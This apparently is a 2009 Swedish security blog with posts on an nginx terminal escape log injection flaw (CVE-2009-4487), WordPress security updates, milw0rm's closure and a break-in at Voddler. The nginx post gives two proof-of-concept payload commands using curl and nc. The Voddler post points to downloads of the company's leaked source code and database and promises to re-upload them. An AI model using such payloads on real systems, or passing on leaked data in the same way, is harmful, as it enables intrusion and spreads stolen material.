Fick mail i dagarna om en ”Terminal Escape Sequence in Logs Command Injection Vulnerability” i nginx vilket var intressant, särskillt då exempelvis wordpress.com använder sig av nginx för lastbalansering.
Dock är det bara nginx 0.7.64 som är sårbar.
Exempel 1:
curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
Exempel 2:
echo -en ”GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d” > payload nc localhost 80 < payload
Det krävs även att användaren öppnar loggfilerna sedan i terminalen.
Lite kuriosa nedan:
CVE: CVE-2009-4487
Bugtraq ID: 37711
Lösning: Uppgradera din version av nginx
november 16th, 2009
admin
WordPress 2.8.6 är släppt och även detta är en säkerhetsuppgradering. Det är med andra ord rekommenderat att uppgradera så snart som möjligt (speciellt om du tillåter registrering av nya användare på din sida).
Inte helt oväntat, det är nog inte den sista säkerhetsuppdateringen för WordPress vi ser detta år 
Dags att uppdatera igen.
WordPress 2.8.3 är just släppt och är en uppföljning på de säkerhetsuppdateringar som skedde i och med 2.8.2 då man missade vissa delar. Man bör med andra ord uppgradera sin installation så snart som möjligt för att vara på den säkra sidan.
Ladda ner WordPress 2.8.3 »
Ladda ner Svenska WordPress 2.8.3 »
Nu har WordPress 2.8.2 släppts, en XSS bugg har hittats i admin panelen.
Så det är ju bara att ta och uppgradera då.
Ladda hem WordPress 2.8.2 Svenska
Eller ladda hem WordPress 2.8.2 Engelska
Str0ke som äger milw0rm har valt att inte fortsätta med det, lite oväntat med tanke på trafiken han har.
Ska bli kul att se om det blir ett uppköp istället.
Han skriver så här på milw0rm:
Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don’t 
. For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn’t fair to the authors on this site. I appreciate and thank everyone for their support in the past.
Be safe, /str0ke
Voddler som ska lansera en ny tjänst för att se film över nätet med samma principer som Spotify har blivit hackade.
Någon hade döpt konfigurationsfilerna till .ini och lämnat dom i en publik mapp, och i den fanns lösenord för databasen, vilket var samma för root på den maskinen.
För den som är intresserad finns all deras källkod att ladda ner nedan:
Voddler’s databas
Om den försvinner så lägger jag upp en kopia.
Grundaren Mattias Hjelmstedt sa såhär vid lanseringen för en vecka sedan ungefär:
- Voddler kommer att ge helt nya möjligheter att uppleva film i hemmet. Vi tror att det kommer bli en mycket stor efterfrågan på tjänsten, därför har vi lagt över hundra manår på utvecklingen. Nu är både tiden och tekniken mogen för en lansering. Voddler är motsatsen till fildelningssajternas oinspirerande torrents med filmer av varierad kvalitet. Det här är framtiden, både för användarna och för filmbolagen.
Och han har nu även svarat efter hacket med detta:
“Lanseringen kommer inte att fördröjas, det var våran temporära website som man kom igenom på. Inte den som ska gå skarpt. Det har inte heller något med streamingtjänsten och teknologin att göra. Det är självklart lite förarjligt, men det är numera helt tilltäppt och säkerhetsnivån är uppskruvad högt nu.”
Referenser:
http://webbsnack.wordpress.com/2009/07/08/voddler-nya-spotify-for-filmer-hackades-igar/
http://www.idg.se/2.1085/1.238506/intrang-pa-voddler–bara-timmar-efter-premiaren
http://sakerhet.idg.se/2.1070/1.238506/intrang-pa-voddler–bara-timmar-efter-premiaren
Kommentarer